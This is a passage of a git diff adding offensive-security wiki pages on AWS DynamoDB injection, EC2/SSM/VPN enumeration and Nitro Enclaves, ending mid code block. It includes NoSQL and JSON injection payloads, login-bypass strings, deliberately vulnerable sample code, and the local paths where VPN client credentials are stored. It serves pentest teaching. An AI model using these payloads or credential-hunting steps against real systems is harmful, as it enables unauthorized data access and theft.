+aws dynamodb describe-export --export-arn <arn>
+
+# Misc
+aws dynamodb describe-endpoints #Dynamodb endpoints
+```
+
+### Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md" %}
+[aws-dynamodb-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md)
+{% endcontent-ref %}
+
+### Privesc
+
+{% content-ref url="../aws-privilege-escalation/aws-dynamodb-privesc.md" %}
+[aws-dynamodb-privesc.md](../aws-privilege-escalation/aws-dynamodb-privesc.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-dynamodb-post-exploitation.md" %}
+[aws-dynamodb-post-exploitation.md](../aws-post-exploitation/aws-dynamodb-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../aws-persistence/aws-dynamodb-persistence.md" %}
+[aws-dynamodb-persistence.md](../aws-persistence/aws-dynamodb-persistence.md)
+{% endcontent-ref %}
+
+## DynamoDB Injection
+
+### SQL Injection
+
+There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**.
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/sql-injection" %}
+
+### NoSQL Injection
+
+In DynamoDB different **conditions** can be used to retrieve data, like in a common NoSQL Injection if it's possible to **chain more conditions to retrieve** data you could obtain hidden data (or dump the whole table).\
+You can find here the conditions supported by DynamoDB: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API\_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html)
+
+Note that **different conditions** are supported if the data is being accessed via **`query`** or via **`scan`**.
+
+{% hint style="info" %}
+Actually, **Query** actions need to specify the **condition "EQ" (equals)** in the **primary** key to works, making it much **less prone to NoSQL injections** (and also making the operation very limited).
+{% endhint %}
+
+If you can **change the comparison** performed or add new ones, you could retrieve more data.
+
+```bash
+# Comparators to dump the database
+"NE": "a123" #Get everything that doesn't equal "a123"
+"NOT_CONTAINS": "a123" #What you think
+"GT": " " #All strings are greater than a space
+```
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/nosql-injection" %}
+
+### Raw Json injection
+
+{% hint style="danger" %}
+**This vulnerability is based on dynamodb Scan Filter which is now deprecated!**
+{% endhint %}
+
+**DynamoDB** accepts **Json** objects to **search** for data inside the DB. If you find that you can write in the json object sent to search, you could make the DB dump, all the contents.
+
+For example, injecting in a request like:
+
+{% code overflow="wrap" %}
+```bash
+'{"Id": {"ComparisonOperator": "EQ","AttributeValueList": [{"N": "' + user_input + '"}]}}'
+```
+{% endcode %}
+
+an attacker could inject something like:
+
+`1000"}],"ComparisonOperator": "GT","AttributeValueList": [{"N": "0`
+
+fix the "EQ" condition searching for the ID 1000 and then looking for all the data with a Id string greater and 0, which is all.
+
+Another **vulnerable example using a login** could be:
+
+```python
+scan_filter = """{
+    "username": {
+        "ComparisonOperator": "EQ",
+        "AttributeValueList": [{"S": "%s"}]
+    },
+    "password": {
+        "ComparisonOperator": "EQ",
+        "AttributeValueList": [{"S": "%s"}]
+    }
+}
+""" % (user_data['username'], user_data['password'])
+
+dynamodb.scan(TableName="table-name", ScanFilter=json.loads(scan_filter))
+```
+
+This would be vulnerable to:
+
+```
+username: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none
+password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none
+```
+
+### :property Injection
+
+Some SDKs allows to use a string indicating the filtering to be performed like:
+
+{% code overflow="wrap" %}
+```java
+new ScanSpec().withProjectionExpression("UserName").withFilterExpression(user_input+" = :username and Password = :password").withValueMap(valueMap)
+```
+{% endcode %}
+
+You need to know that searching in DynamoDB for **substituting** an attribute **value** in **filter expressions** while scanning the items, the tokens should **begin** with the **`:`** character. Such tokens will be **replaced** with actual **attribute value at runtime**.
+
+Therefore, a login like the previous one can be bypassed with something like:
+
+```bash
+:username = :username or :username
+# This will generate the query:
+# :username = :username or :username = :username and Password = :password
+# which is always true
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
new file mode 100644
index 0000000000..3ba4235a82
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
@@ -0,0 +1,352 @@
+# AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## VPC & Networking
+
+Learn what a VPC is and about its components in:
+
+{% content-ref url="aws-vpc-and-networking-basic-information.md" %}
+[aws-vpc-and-networking-basic-information.md](aws-vpc-and-networking-basic-information.md)
+{% endcontent-ref %}
+
+## EC2
+
+Amazon EC2 is utilized for initiating **virtual servers**. It allows for the configuration of **security** and **networking** and the management of **storage**. The flexibility of Amazon EC2 is evident in its ability to scale resources both upwards and downwards, effectively adapting to varying requirement changes or surges in popularity. This feature diminishes the necessity for precise traffic predictions.
+
+Interesting things to enumerate in EC2:
+
+* Virtual Machines
+  * SSH Keys
+  * User Data
+  * Existing EC2s/AMIs/Snapshots
+* Networking
+  * Networks
+  * Subnetworks
+  * Public IPs
+  * Open ports
+* Integrated connections with other networks outside AWS
+
+### Instance Profiles
+
+Using **roles** to grant permissions to applications that run on **EC2 instances** requires a bit of extra configuration. An application running on an EC2 instance is abstracted from AWS by the virtualized operating system. Because of this extra separation, you need an additional step to assign an AWS role and its associated permissions to an EC2 instance and make them available to its applications.
+
+This extra step is the **creation of an** [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) attached to the instance. The **instance profile contains the role and** can provide the role's temporary credentials to an application that runs on the instance. Those temporary credentials can then be used in the application's API calls to access resources and to limit access to only those resources that the role specifies. Note that **only one role can be assigned to an EC2 instance** at a time, and all applications on the instance share the same role and permissions.
+
+### Metadata Endpoint
+
+AWS EC2 metadata is information about an Amazon Elastic Compute Cloud (EC2) instance that is available to the instance at runtime. This metadata is used to provide information about the instance, such as its instance ID, the availability zone it is running in, the IAM role associated with the instance, and the instance's hostname.
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %}
+
+### Enumeration
+
+```bash
+# Get EC2 instances
+aws ec2 describe-instances
+aws ec2 describe-instance-status #Get status from running instances
+
+# Get user data from each ec2 instance
+for instanceid in $(aws ec2 describe-instances --profile <profile> --region us-west-2 | grep -Eo '"i-[a-zA-Z0-9]+' | tr -d '"'); do
+  echo "Instance ID: $instanceid"
+  aws ec2 describe-instance-attribute --profile <profile> --region us-west-2 --instance-id "$instanceid" --attribute userData | jq ".UserData.Value" | tr -d '"' | base64 -d
+  echo ""
+  echo "-------------------"
+done
+
+# Instance profiles
+aws iam list-instance-profiles
+aws iam list-instance-profiles-for-role --role-name <name>
+
+# Get tags
+aws ec2 describe-tags
+
+# Get volumes
+aws ec2 describe-volume-status
+aws ec2 describe-volumes
+
+# Get snapshots
+aws ec2 describe-snapshots --owner-ids self
+
+# Scheduled instances
+aws ec2 describe-scheduled-instances
+
+# Get custom images
+aws ec2 describe-images --owners self 
+
+# Get Elastic IPs
+aws ec2 describe-addresses
+
+# Get current output
+aws ec2 get-console-output --instance-id [id]
+
+# Get VPN customer gateways
+aws ec2 describe-customer-gateways
+aws ec2 describe-vpn-gateways
+aws ec2 describe-vpn-connections 
+
+# List conversion tasks to upload/download VMs
+aws ec2 describe-conversion-tasks
+aws ec2 describe-import-image-tasks
+
+# Get Bundle Tasks
+aws ec2 describe-bundle-tasks
+
+# Get Classic Instances
+aws ec2 describe-classic-link-instances
+
+# Get Dedicated Hosts
+aws ec2 describe-hosts
+
+# Get SSH Key Pairs
+aws ec2 describe-key-pairs
+
+# Get Internet Gateways
+aws ec2 describe-internet-gateways
+
+# Get NAT Gateways
+aws ec2 describe-nat-gateways 
+
+# Get subnetworks
+aws ec2 describe-subnets
+
+# Get FW rules
+aws ec2 describe-network-acls
+
+# Get security groups
+aws ec2 describe-security-groups
+
+# Get interfaces
+aws ec2 describe-network-interfaces
+
+# Get routes table
+aws ec2 describe-route-tables
+
+# Get VPCs
+aws ec2 describe-vpcs 
+aws ec2 describe-vpc-peering-connections
+```
+
+### Unauthenticated Access
+
+{% content-ref url="../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md" %}
+[aws-ec2-unauthenticated-enum.md](../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Privesc
+
+In the following page you can check how to **abuse EC2 permissions to escalate privileges**:
+
+{% content-ref url="../../aws-privilege-escalation/aws-ec2-privesc.md" %}
+[aws-ec2-privesc.md](../../aws-privilege-escalation/aws-ec2-privesc.md)
+{% endcontent-ref %}
+
+### Post-Exploitation
+
+{% content-ref url="../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/" %}
+[aws-ec2-ebs-ssm-and-vpc-post-exploitation](../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/)
+{% endcontent-ref %}
+
+## EBS
+
+Amazon **EBS** (Elastic Block Store) **snapshots** are basically static **backups** of AWS EBS volumes. In other words, they are **copies** of the **disks** attached to an **EC2** Instance at a specific point in time. EBS snapshots can be copied across regions and accounts, or even downloaded and run locally.
+
+Snapshots can contain **sensitive information** such as **source code or APi keys**, therefore, if you have the chance, it's recommended to check it.
+
+### Difference AMI & EBS
+
+An **AMI** is used to **launch an EC2 instance**, while an EC2 **Snapshot** is used to **backup and recover data stored on an EBS volume**. While an EC2 Snapshot can be used to create a new AMI, it is not the same thing as an AMI, and it does not include information about the operating system, application server, or other software required to run an application.
+
+### Privesc
+
+In the following page you can check how to **abuse EBS permissions to escalate privileges**:
+
+{% content-ref url="../../aws-privilege-escalation/aws-ebs-privesc.md" %}
+[aws-ebs-privesc.md](../../aws-privilege-escalation/aws-ebs-privesc.md)
+{% endcontent-ref %}
+
+## SSM
+
+**Amazon Simple Systems Manager (SSM)** allows to remotely manage floats of EC2 instances to make their administrations much more easy. Each of these instances need to be running the **SSM Agent service as the service will be the one getting the actions and performing them** from the AWS API.
+
+**SSM Agent** makes it possible for Systems Manager to update, manage, and configure these resources. The agent **processes requests from the Systems Manager service in the AWS Cloud**, and then runs them as specified in the request.
+
+The **SSM Agent comes**[ **preinstalled in some AMIs**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) or you need to [**manually install them**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html) on the instances. Also, the IAM Role used inside the instance needs to have the policy **AmazonEC2RoleforSSM** attached to be able to communicate.
+
+### Enumeration
+
+```bash
+aws ssm describe-instance-information
+aws ssm describe-parameters
+aws ssm describe-sessions --state [Active|History]
+aws ssm describe-instance-patches --instance-id <id>
+aws ssm describe-instance-patch-states --instance-ids <id>
+aws ssm describe-instance-associations-status --instance-id <id>
+```
+
+You can check in an EC2 instance if Systems Manager is runnign just by executing:
+
+```bash
+ps aux | grep amazon-ssm
+```
+
+### Privesc
+
+In the following page you can check how to **abuse SSM permissions to escalate privileges**:
+
+{% content-ref url="../../aws-privilege-escalation/aws-ssm-privesc.md" %}
+[aws-ssm-privesc.md](../../aws-privilege-escalation/aws-ssm-privesc.md)
+{% endcontent-ref %}
+
+## ELB
+
+**Elastic Load Balancing** (ELB) is a **load-balancing service for Amazon Web Services** (AWS) deployments. ELB automatically **distributes incoming application traffic** and scales resources to meet traffic demands.
+
+### Enumeration
+
+```bash
+# List internet-facing ELBs
+aws elb describe-load-balancers
+aws elb describe-load-balancers | jq '.LoadBalancerDescriptions[]| select( .Scheme | contains("internet-facing"))|.DNSName'
+
+# DONT FORGET TO CHECK VERSION 2
+aws elbv2 describe-load-balancers
+aws elbv2 describe-load-balancers | jq '.LoadBalancers[].DNSName'
+aws elbv2 describe-listeners --load-balancer-arn <load_balancer_arn>
+```
+
+## Launch Templates & Autoscaling Groups
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Launch templates
+aws ec2 describe-launch-templates
+aws ec2 describe-launch-templates --launch-template-id <launch_template_id>
+## Get details, like user data
+aws ec2 describe-launch-template-versions --launch-template-id <launch_template_id>
+
+# Autoscaling
+aws autoscaling describe-auto-scaling-groups
+aws autoscaling describe-auto-scaling-instances
+aws autoscaling describe-launch-configurations
+aws autoscaling describe-load-balancer-target-groups
+aws autoscaling describe-load-balancers
+```
+{% endcode %}
+
+## Nitro
+
+AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture.
+
+Get more information and how to enumerate it from:
+
+{% content-ref url="aws-nitro-enum.md" %}
+[aws-nitro-enum.md](aws-nitro-enum.md)
+{% endcontent-ref %}
+
+## VPN
+
+A VPN allows to connect your **on-premise network (site-to-site VPN)** or the **workers laptops (Client VPN)** with a **AWS VPC** so services can accessed without needing to expose them to the internet.
+
+#### Basic AWS VPN Components
+
+1. **Customer Gateway**:
+   * A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection.
+   * It is essentially a physical device or software application on your side of the Site-to-Site VPN connection.
+   * You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway.
+   * It serves as a reference point for setting up the VPN connection and doesn't incur additional charges.
+2. **Virtual Private Gateway**:
+   * A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection.
+   * It is attached to your VPC and serves as the target for your VPN connection.
+   * VPG is the AWS side endpoint for the VPN connection.
+   * It handles the secure communication between your VPC and your on-premises network.
+3. **Site-to-Site VPN Connection**:
+   * A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel.
+   * This type of connection requires a Customer Gateway and a Virtual Private Gateway.
+   * It's used for secure, stable, and consistent communication between your data center or network and your AWS environment.
+   * Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection.
+4. **Client VPN Endpoint**:
+   * A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions.
+   * It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network.
+   * It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks.
+   * With Client VPN, each client device uses a VPN client software to establish a secure connection.
+
+You can [**find more information about the benefits and components of AWS VPNs here**](aws-vpc-and-networking-basic-information.md#vpn).
+
+### Enumeration
+
+```bash
+# VPN endpoints
+## Check used subnetwork, authentication, SGs, connected...
+aws ec2 describe-client-vpn-endpoints
+
+## Get AWS network info related to the vpn endpoint
+aws ec2 describe-client-vpn-target-networks --client-vpn-endpoint-id <id>
+
+## Get AWS subnet & ip range the VPN iconnected to
+aws ec2 describe-client-vpn-routes --client-vpn-endpoint-id <id>
+
+## Check authorization rules
+aws ec2 describe-client-vpn-authorization-rules --client-vpn-endpoint-id <id>
+
+## Get current connections to the VPN endpoint
+aws ec2 describe-client-vpn-connections --client-vpn-endpoint-id <id>
+
+# Get VPN gateways and check with which VPC each is connected
+aws ec2 describe-vpn-gateways
+
+# Get VPN site-to-site connections
+aws ec2 describe-vpn-connections
+```
+
+### Local Enumeration
+
+**Local Temporary Credentials**
+
+When AWS VPN Client is used to connect to a VPN, the user will usually **login in AWS** to get access to the VPN. Then, some **AWS credentials are created and stored** locally to establish the VPN connection. These credentials are **stored in** `$HOME/.config/AWSVPNClient/TemporaryCredentials/<region>/temporary-credentials.txt` and contains an **AccessKey**, a **SecretKey** and a **Token**.
+
+The credentials belong to the user `arn:aws:sts::<acc-id>:assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials` (TODO: research more about the permissions of this credentials).
+
+**opvn config files**
+
+If a **VPN connection was stablished** you should search for **`.opvn`** config files in the system. Moreover, one place where you could find the **configurations** is in **`$HOME/.config/AWSVPNClient/OpenVpnConfigs`**
+
+#### **Post Exploitaiton**
+
+{% content-ref url="../../aws-post-exploitation/aws-vpn-post-exploitation.md" %}
+[aws-vpn-post-exploitation.md](../../aws-post-exploitation/aws-vpn-post-exploitation.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md
new file mode 100644
index 0000000000..2e40121dfb
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md
@@ -0,0 +1,306 @@
+# AWS - Nitro Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture.
+
+### Nitro Enclaves
+
+**AWS Nitro Enclaves** provides a secure, **isolated compute environment within Amazon EC2 instances**, specifically designed for processing highly sensitive data. Leveraging the AWS Nitro System, these enclaves ensure robust **isolation and security**, ideal for **handling confidential information** such as PII or financial records. They feature a minimalist environment, significantly reducing the risk of data exposure. Additionally, Nitro Enclaves support cryptographic attestation, allowing users to verify that only authorized code is running, crucial for maintaining strict compliance and data protection standards.
+
+{% hint style="danger" %}
+Nitro Enclave images are **run from inside EC2 instances** and you cannot see from the AWS web console if an EC2 instances is running images in Nitro Enclave or not.
+{% endhint %}
+
+## Nitro Enclave CLI installation
+
+Follow the all instructions [**from the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave). However, these are the most important ones:
+
+```bash
+# Install tools
+sudo amazon-linux-extras install aws-nitro-enclaves-cli -y
+sudo yum install aws-nitro-enclaves-cli-devel -y
+
+# Config perms
+sudo usermod -aG ne $USER
+sudo usermod -aG docker $USER
+
+# Check installation
+nitro-cli --version
+
+# Start and enable the Nitro Enclaves allocator service.
+sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service
+```
+
+## Nitro Enclave Images
+
+The images that you can run in Nitro Enclave are based on docker images, so you can create your Nitro Enclave images from docker images like:
+
+```bash
+# You need to have the docker image accesible in your running local registry
+# Or indicate the full docker image URL to access the image
+nitro-cli build-enclave --docker-uri <docker-img>:<tag> --output-file nitro-img.eif
+```
+
+As you can see the Nitro Enclave images use the extension **`eif`** (Enclave Image File).
+
+The output will look similar to:
+
+```
+Using the locally available Docker image...
+Enclave Image successfully created.
+{
+  "Measurements": {
+    "HashAlgorithm": "Sha384 { ... }",
+    "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
+    "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
+    "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
+  }
+}
+```
+
+### Run an Image
+
+As per [**the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave), in order to run an enclave image you need to assign it memory of **at least 4 times the size of the `eif` file**. It's possible to configure the default resources to give to it in the file
+
+```shell
+/etc/nitro_enclaves/allocator.yaml
+```
+
+{% hint style="danger" %}
+Always remember that you need to **reserve some resources for the parent EC2** instance also!
+{% endhint %}
+
+After knowing the resources to give to an image and even having modified the configuration file it's possible to run an enclave image with:
+
+{% code overflow="wrap" %}
+```shell
+# Restart the service so the new default values apply
+sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service
+
+# Indicate the CPUs and memory to give
+nitro-cli run-enclave --cpu-count 2 --memory 3072 --eif-path hello.eif --debug-mode --enclave-cid 16
+```
+{% endcode %}
+
+### Enumerate Enclaves
+
+If you compromise and EC2 host it's possible to get a list of running enclave images with:
+
+```bash
+nitro-cli describe-enclaves
+```
+
+It's **not possible to get a shell** inside a running enclave image because thats the main purpose of enclave, however, if you used the parameter **`--debug-mode`**, it's possible to get the **stdout** of it with:
+
+```shell
+ENCLAVE_ID=$(nitro-cli describe-enclaves | jq -r ".[0].EnclaveID")
+nitro-cli console --enclave-id ${ENCLAVE_ID}
+```
+
+### Terminate Enclaves
+
+If an attacker compromise an EC2 instance by default he won't be able to get a shell inside of them, but he will be able to **terminate them** with:
+
+```shell
+nitro-cli terminate-enclave --enclave-id ${ENCLAVE_ID}
+```
+
+## Vsocks
+
+The only way to communicate with an **enclave** running image is using **vsocks**.
+
+**Virtual Socket (vsock)** is a socket family in Linux specifically designed to facilitate **communication** between virtual machines (**VMs**) and their **hypervisors**, or between VMs **themselves**. Vsock enables efficient, **bi-directional communication** without relying on the host's networking stack. This makes it possible for VMs to communicate even without network configurations, **using a 32-bit Context ID (CID) and port numbers** to identify and manage connections. The vsock API supports both stream and datagram socket types, similar to TCP and UDP, providing a versatile tool for user-level applications in virtual environments.
+
+{% hint style="success" %}
+Therefore, an vsock address looks like this: `<CID>:<Port>`
+{% endhint %}
+
+To find **CIDs** of the enclave running images you could just execute the following cmd and thet the **`EnclaveCID`**:
+
+<pre class="language-bash"><code class="lang-bash">nitro-cli describe-enclaves
+
+[
+  {
+    "EnclaveName": "secure-channel-example",
+    "EnclaveID": "i-0bc274f83ade02a62-enc18ef3d09c886748",
+    "ProcessID": 10131,
+<strong>    "EnclaveCID": 16,
+</strong>    "NumberOfCPUs": 2,
+    "CPUIDs": [
+      1,
+      3
+    ],
+    "MemoryMiB": 1024,
+    "State": "RUNNING",
+    "Flags": "DEBUG_MODE",
+    "Measurements": {
+      "HashAlgorithm": "Sha384 { ... }",
+      "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
+      "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
+      "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
+    }
+  }
+]
+</code></pre>
+
+{% hint style="warning" %}
+Note that from the host there isn't any way to know if a CID is exposing any port! Unless using some **vsock port scanner like** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner).
+{% endhint %}
+
+### Vsock Server/Listener
+
+Find here a couple of examples:
+
+* [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py)
+
+<details>
+
+<summary>Simple Python Listener</summary>
+
+```python
+#!/usr/bin/env python3
+
+# From 
+https://medium.com/@F.DL/understanding-vsock-684016cf0eb0
+
+import socket
+
+CID = socket.VMADDR_CID_HOST
+PORT = 9999
+
+s = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
+s.bind((CID, PORT))
+s.listen()
+(conn, (remote_cid, remote_port)) = s.accept()
+
+print(f"Connection opened by cid={remote_cid} port={remote_port}")
+
+while True:
+    buf = conn.recv(64)
+    if not buf:
+        break
+
+    print(f"Received bytes: {buf}")
+```
+
+</details>
+
+```bash
+# Using socat
+socat VSOCK-LISTEN:<port>,fork EXEC:"echo Hello from server!"
+```
+
+### Vsock Client
+
+Examples:
+
+* [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py)
+
+<details>
+
+<summary>Simple Python Client</summary>
+
+```python
+#!/usr/bin/env python3
+
+#From https://medium.com/@F.DL/understanding-vsock-684016cf0eb0
+
+import socket
+
+CID = socket.VMADDR_CID_HOST
+PORT = 9999
+
+s = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
+s.connect((CID, PORT))
+s.sendall(b"Hello, world!")
+s.close()
+```
+
+</details>
+
+```bash
+# Using socat
